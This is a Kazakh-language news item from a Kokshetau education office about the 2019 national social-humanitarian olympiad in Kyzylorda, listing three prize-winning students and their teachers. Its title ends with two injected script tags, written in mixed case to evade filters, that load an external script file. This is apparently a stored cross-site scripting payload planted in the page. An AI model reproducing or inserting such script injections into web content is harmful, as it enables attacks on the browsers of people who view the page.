Қоғамдық-гуманитарлық бағыттағы жалпы білім беретін пәндер бойынша Республикалық олимпиаданың қорытындысы туралы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
29.03.2019
2019 жылғы 25 - 29 наурыз аралығында Қызылорда қ. қоғамдық-гуманитарлық бағыттағы жалпы білім беретін пәндер бойынша Республикалық олимпиада өтті.
Олимпиадаға Қазақстанның барлық өңірлерінен, Нұр - Сұлтан және Алматы қалаларынан, республикалық білім беру ұйымдарынан 20 команда қатысты. ҚГБ пәндер бойынша Ақмола облысынан 30 оқушы, оның ішінде Көкшетау қ. мектептерінің: №1 ОМГ-2, №3 МГ-2, №5 «Таңдау» КГ-4, №6 ОМЛ-1, №11 ОМГ-1, №13 ЭМГ-1, №14 ОМ-1, ГТЛ-1- 13 оқушысы сайысқа түсіп, бақтарын сынады.
Олимпиада қорытындысы бойынша төмендегідей жүлдегерлер анықталды:
ІІІ дәрежелі дипломмен 3 оқушы:
- Проказин Владислав – Көкшетау қ. №1 орта мектеп-гимназиясының 11 сынып оқушысы «Неміс тілі» пәні бойынша; мұғалімі Грищенко Дина Викторовна
- Пулькина Полина - Көкшетау қ. №1 орта мектеп-гимназиясының 10 сынып оқушысы «Орыс тілі мен әдебиеті» пәні; мұғалімі Иттерова Ирина Валентиновна.
- Барахоева Милана - Көкшетау қ. №5 «Таңдау» көппрофильді гимназиясының 10 сынып оқушысы «Орыс тілі мен әдебиеті» пәні; мұғалімі Жанабергенова Аягоз Кошановна.
Көкшетау қ. білім бөлімі жүлдегерлерді жеңістерімен құттықтайды және оқушыларды Республикалық пән олимпиадасына сапалы дайындағаны үшін педагогтарға алғысын білдіреді.
Алдағы уақытта шығармашылық табыстар тілейміз!